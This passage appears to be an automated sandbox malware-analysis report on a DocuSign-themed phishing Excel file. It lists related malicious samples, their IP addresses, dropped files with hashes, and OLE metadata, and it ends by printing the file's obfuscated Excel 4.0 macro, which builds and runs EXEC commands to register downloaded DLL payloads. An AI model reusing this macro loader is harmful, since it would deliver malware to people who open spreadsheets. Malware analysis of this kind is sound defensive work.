                                                                                                                                                    CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.181.49
                                                                                                                                                    PO.exeGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.0.218
                                                                                                                                                    Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.16.95
                                                                                                                                                    ESCANEAR_FACTURA-20794564552_docx.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.214.158.75
                                                                                                                                                    AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.46.55
                                                                                                                                                    iAxkn PDF.exeGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.100.181
                                                                                                                                                    carta de pago pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.5.166
                                                                                                                                                    PO.exeGet hashmaliciousBrowse
                                                                                                                                                    • 108.179.232.42
                                                                                                                                                    payment details.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 50.87.95.32
                                                                                                                                                    new order.exeGet hashmaliciousBrowse
                                                                                                                                                    • 108.179.232.42
                                                                                                                                                    CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                                                                                                                                                    • 192.185.181.49
                                                                                                                                                    RdLlHaxEKP.exeGet hashmaliciousBrowse
                                                                                                                                                    • 162.214.184.71
                                                                                                                                                    Drawings2.exeGet hashmaliciousBrowse
                                                                                                                                                    • 198.57.247.220

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19Purchase Order list.exeGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    Complaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    SHIPPING-DOCUMENT.docxGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    REVISED ORDER 2322020.EXEGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    PO112000891122110.exeGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    OutplayedInstaller (1).exeGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    Facecheck - app-Installer (1).exeGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    Buff-Installer (9).exeGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    coltTicket#513473.htmGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    FortPlayerInstaller.exeGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    RGB HeroInstaller.exeGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    Buff-Installer.exeGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    smartandfinalTicket#51347303511505986.htmGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    f4b1bde3-706a-40d2-8ace-693803810b6f.exeGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    LIQUIDACION INTERBANCARIA 02_22_2021.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    document-550193913.xlsGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    receipt145.htmGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100
                                                                                                                                                    xerox for hycite.htmGet hashmaliciousBrowse
                                                                                                                                                    • 138.36.237.100

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75A
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1559
                                                                                                                                                    Entropy (8bit):7.399832861783252
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep
                                                                                                                                                    MD5:ADAB5C4DF031FB9299F71ADA7E18F613
                                                                                                                                                    SHA1:33E4E80807204C2B6182A3A14B591ACD25B5F0DB
                                                                                                                                                    SHA-256:7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
                                                                                                                                                    SHA-512:983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: 0...0..........}[Q&.v...t...S..0...*.H........0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0...181102000000Z..301231235959Z0..1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Sectigo Limited1705..U....Sectigo RSA Domain Validation Secure Server CA0.."0...*.H.............0.........s3..< ....E..>..?.A.20.l.......-?.M......b..Hy...N..2%.....P?.L.@*.9.....2A.&.#z. ... .<.Do.u..@.2.....#>...o]Q.j.i.O.ri..Lm.....~......7x...4.V.X....d[.7..(h.V...\......$..0......z...B......J.....@..o.BJd..0.....'Z..X......c.oV...`4.t........_.........n0..j0...U.#..0...Sy.Z.+J.T.......f.0...U........^.T...w.......a.0...U...........0...U.......0.......0...U.%..0...+.........+.......0...U. ..0.0...U. .0...g.....0P..U...I0G0E.C.A.?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v..+........j0h0?..+.....0..3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%..+.....0.
                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75A
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):282
                                                                                                                                                    Entropy (8bit):3.1079460455882972
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:kkFklrGmaE/XfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ15z:kKVTkqjXxp9jKFlIaYM2+/LOjA/
                                                                                                                                                    MD5:5C0062E1FDB7DD1FA8E52F75B646DB76
                                                                                                                                                    SHA1:FD494729C69970219FF8E770389F06C234DF0B80
                                                                                                                                                    SHA-256:9BA8C1B92E4FA8A1AD67B0742654642F1B375E3AB1A6ECF94E3C62C5B2AAF385
                                                                                                                                                    SHA-512:54CCB267EB033615F38F04CAEA9547117F3EA6CF6A7269053599EB9294ADF142D1B43E36E7A534C50F1A3264973712BD5A2585F81C2CEED366BA6F24B6D02B12
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: p...... .........cC.?...(....................................................... ........@u.>r..@8..................h.t.t.p.:././.c.r.t...s.e.c.t.i.g.o...c.o.m./.S.e.c.t.i.g.o.R.S.A.D.o.m.a.i.n.V.a.l.i.d.a.t.i.o.n.S.e.c.u.r.e.S.e.r.v.e.r.C.A...c.r.t...".5.b.d.b.9.3.8.0.-.6.1.7."...
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3A40564D-B724-4EFB-A118-96220352F3F1
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):132891
                                                                                                                                                    Entropy (8bit):5.375885170203908
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:9cQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:ZcQ9DQW+z0XiK
                                                                                                                                                    MD5:45B476C199428226B8C8D806849E0314
                                                                                                                                                    SHA1:0328182400FD1C6524C344C653F87B862E5C2B88
                                                                                                                                                    SHA-256:27A61C896C19DD04F94D375E4F7E4C65D0E9926668EEC6F4151972E0EDC8B2EF
                                                                                                                                                    SHA-512:6009F199524974C95991E99FAF8A4C344CE9ADB60AC06EB2E39C0E09DDA9B1FF829C114630D226BD26163557644B56D85949E9BDF9D2222EFB124C03A098EA51
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-23T14:59:47">.. Build: 16.0.13822.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\AC910000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):31496
                                                                                                                                                    Entropy (8bit):7.6412973417306045
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:A2EQtJPWEt4wFVfViKzV8aoVT0QNuzWKPqSFpBHRb7y3Tud3KyGqjNHWqK:E2hViKiW+u7qS7BHRbu3TukcRTK
                                                                                                                                                    MD5:97AEF11CCFBF9743A5D7C8DCDC32BDBC
                                                                                                                                                    SHA1:B2A73BBA538D4B8A9E3B9149BE140CA0078FFD6F
                                                                                                                                                    SHA-256:DAEC2DDEA16AA1520E481F8B0DE9CEC060E257C0AC96B3D34187DF65DBF4B0A8
                                                                                                                                                    SHA-512:A822C5919341CCF2A31FABCE1AC10AF6B8A675D24F7CCCD06E932629E0C89013B2B595E978644F4DED5CC8A564AB4BF122F181E5968E6CFFA3D1585AFA99215E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.N.0...?D......5e1.r....\.6..|....[.C.m.l.s..8.._-... ...eg.U.W.u-..p[_...pJ..eK@v59.1~X.....[..~q...+......|.".k.x.r.:...O..K.R.2....a&.M.n.4.r.\...T...<."..}B...."Qi..O.j?.i...GKf...... Y...c...(..B3..a....B.c......y.c..Z....F....1.......}.O..7.Ir4.kXH0M...BF........^..P*H..vv...d.j.J......P#....Ce.D|.L....\.........~..H.)."..O..o7.{....s......&..{...{..............9.a..k...:...a.D...."5.+.|J)P[.y9.'/.......PK..........!.......V.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint-1992179913-02182021.xls.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:44 2020, mtime=Tue Feb 23 22:59:53 2021, atime=Tue Feb 23 22:59:53 2021, length=60928, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2300
                                                                                                                                                    Entropy (8bit):4.654213571979597
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:8WK1/F+R3HVF8pB6pWK1/F+R3HVF8pB6:8Ff6H8pKFf6H8p
                                                                                                                                                    MD5:6CE24E47B88D8ED0380A85F11DC331B4
                                                                                                                                                    SHA1:0609005F0D8C9B14109CB3D4792DE2824B5BB824
                                                                                                                                                    SHA-256:67F633A7382E5BA00488B61F8BA1DCA1F3A3F90A21187294173EE211FB0E5810
                                                                                                                                                    SHA-512:58263D0E991342D0292CF3251ECCA2E92A036AD9CDA913871CD78034D7216B1139FA586DE32B97A022B8CE5D6FCFFF83F83818E22A11F53EBA857D56B90053BC
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.... ...[./.:...P6l.?...P6l.?................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WRo.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.WRo......S....................K...h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny.WRo......Y..............>......{_.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..:..WRu. .COMPLA~1.XLS..t......>QwxWRu.....h........................C.o.m.p.l.a.i.n.t.-.1.9.9.2.1.7.9.9.1.3.-.0.2.1.8.2.0.2.1...x.l.s.......g...............-.......f...........>.S......C:\Users\user\Desktop\Complaint-1992179913-02182021.xls..8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t.-.1.9.9.2.1.7.9.9.1.3.-.0.2.1.8.2.0.2.1...x.l.s.........:..,.LB.)...As...`.......X.......745773...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Tue Feb 23 22:59:53 2021, atime=Tue Feb 23 22:59:53 2021, length=12288, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):904
                                                                                                                                                    Entropy (8bit):4.664222086421206
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8ErMXU3uElPCH2YgcXPE3YcsqlJ0+WrjAZ/2bDDeLC5Lu4t2Y+xIBjKZm:8pgcXOdlkAZiDz87aB6m
                                                                                                                                                    MD5:5DE43DFCF510EC94C5C28944111630D2
                                                                                                                                                    SHA1:1913CEE4AB5983FB2B00EBF318A98F7079326E5B
                                                                                                                                                    SHA-256:07E557AA6595801D8EFB7A73A39317C26BB8302B7B4986A653D1979A2F536938
                                                                                                                                                    SHA-512:B2C6A7BF332C5361C41EFD0FADAD382DE773CE3D14D3F20A9EB4903B7F8CB1E0D6083BCBDA6608AAB7DC599ACBBE90C7EAB6827333C43DAF9A81C11445D1930A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F........N....-...b.?....J`.?....0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WRo.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.WRo......S....................K...h.a.r.d.z.....~.1.....WR{...Desktop.h.......Ny.WR{......Y..............>.....?...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......745773...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):152
                                                                                                                                                    Entropy (8bit):4.661078402497766
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:oyBVomMYlIFc7FXa+1lIFc7FXamMYlIFc7FXav:dj6YlycZtlycZMYlycZU
                                                                                                                                                    MD5:44EF8DDBAA84E0410A000AC715DF4B24
                                                                                                                                                    SHA1:EA46B84FFE9DB049C77EA50E5E3BB02C3EC523D5
                                                                                                                                                    SHA-256:976B865F247F1FCD9555213FC0B6D702B9FFC050D42A46AF56492C16B81D5912
                                                                                                                                                    SHA-512:46ABB9CAB43385DDFD433C6CF4035DE59DB53454018CFBABF92933066050447B265672FCA4EB94F94DFF0AF1B555E132FEDDB17264325D7EACD54295059BBB1C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: Desktop.LNK=0..[xls]..Complaint-1992179913-02182021.xls.LNK=0..Complaint-1992179913-02182021.xls.LNK=0..[xls]..Complaint-1992179913-02182021.xls.LNK=0..
                                                                                                                                                    C:\Users\user\Desktop\9D910000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):111230
                                                                                                                                                    Entropy (8bit):6.668172188898463
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:5s8rmOAIyyzElBIL6lECbgBGzP5xLm7TdKojnGzeNf7jmGzeNfQaGzeNf/+s8rmd:q8rmOAIyyzElBIL6lECbgB+P5Nm7TdKX
                                                                                                                                                    MD5:4E04F9F72397B3B758687899986998DC
                                                                                                                                                    SHA1:16B81519271E5F3726D93BDEC4DAB856589D10D6
                                                                                                                                                    SHA-256:C081FAA65265BD90138236337CA45F1BDCE683763B34EE84352451F956365666
                                                                                                                                                    SHA-512:8214A33E5B42DD175E5A8FC29FB36B1BB1B52717A705B6E270CED539FF939167DD1E15E1C3A11DD0FEF76E2935CEE2650ABB26DDB2500E635E6AD23EBFDD4704
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: ........T8..........................\.p....pratesh B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1................r..C.a.l.i.b.r.i.1................r..C.a.l.i.b.r.i.1................r..C.a.l.i.b.r.i.1................r..C.a.l.i.b.r.i.1................r..C.a.l.i.b.r.i.1...,...8........r..C.a.l.i.b.r.i.1.......8........r..C.a.l.i.b.r.i.1.......8........r..C.a.l.i.b.r.i.1...h...8........r..C.a.m.b.r.i.a.1.......4........r..C.a.l.i.b.r.i.1................r..C.a.l.i.b.r.i.1................r..C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:42:21 2021, Security: 0
                                                                                                                                                    Entropy (8bit):3.697666945848156
                                                                                                                                                    TrID:
                                                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                    File name:Complaint-1992179913-02182021.xls
                                                                                                                                                    File size:145920
                                                                                                                                                    MD5:b2c46df91cfe891f61af65277461b32b
                                                                                                                                                    SHA1:fd329e179663a40c31f5c567228a59349928a6a5
                                                                                                                                                    SHA256:3b9790a911cff3e1572608f3cc377a3776c63014c4230eebc46b0a220f22b1f5
                                                                                                                                                    SHA512:809890b32a5f370054043a5abbbffdb45e1b1bf5e8f781d2f5537e26b9c5a171c450559e731ec6bbc5b798f3a131e94bb9f06d3523e7a362182b035203a6fcbb
                                                                                                                                                    SSDEEP:3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/9:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOM0
                                                                                                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OLE
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "Complaint-1992179913-02182021.xls"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:True
                                                                                                                                                    Application Name:Microsoft Excel
                                                                                                                                                    Encrypted Document:False
                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:True

                                                                                                                                                    Summary

                                                                                                                                                    Code Page:1251
                                                                                                                                                    Author:
                                                                                                                                                    Last Saved By:Friner
                                                                                                                                                    Create Time:2006-09-16 00:00:00
                                                                                                                                                    Last Saved Time:2021-02-18 13:42:21
                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                    Security:0

                                                                                                                                                    Document Summary

                                                                                                                                                    Document Code Page:1251
                                                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                                                    Contains Dirty Links:False

                                                                                                                                                    Streams

                                                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:4096
                                                                                                                                                    Entropy:0.321292606979
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                                                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:4096
                                                                                                                                                    Entropy:0.2746714277
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                    Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085
                                                                                                                                                    General
                                                                                                                                                    Stream Path:Book
                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                    Stream Size:135085
                                                                                                                                                    Entropy:3.69042254796
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    ,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
